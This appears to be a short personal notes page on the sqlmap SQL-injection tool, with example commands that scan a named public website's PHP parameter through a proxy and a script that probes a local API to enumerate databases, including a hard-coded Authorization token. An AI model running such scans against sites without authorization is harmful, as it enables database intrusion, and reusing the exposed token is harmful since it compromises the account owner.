+++
title = "SQLmap"
description = ""
categories = []
tags = []
weight = 100
+++

## SQLmap
```bash
# simple example
sqlmap --proxy=socks5://127.0.0.1:9999 -u "http://www.risorgimento.it/php/page_gen.php?id_sezione=3"

# some testing script

URL="http://local-api.podiumrewards.com/v1/scotia/recordTypes?reward_profile_id=1"

HEADERS="Accept-Language: es
Authorization: KKqqiF9MbeeCBUr6PsBKwswtmosv72lXTH1IFQVqf4eU51QbrCIndXTrBSn5CH9i0LrC27RLrFUCnEou7Bjnq8jXYA9lAkhQVRiYXbVZk7Wkwl6Fp0FtwrzPAq5OaAtL
Cache-Control: no-cache
Content-Type: application/json
Origin: http://scotia-ca-cr-local-www.podiumrewards.com:8001"

sqlmap -v 2 \
    --url=$URL \
    --method=GET \
    --batch \
    --level=1 \
    --risk=1 \
    --delay=1 \
    --timeout=5 \
    --retries=0 \
    --keep-alive \
    --threads=1 \
    --user-agent=SQLMAP \
    --headers $HEADERS \
    --dbms=MySQL \
    --os=Linux \
    --dbs


```
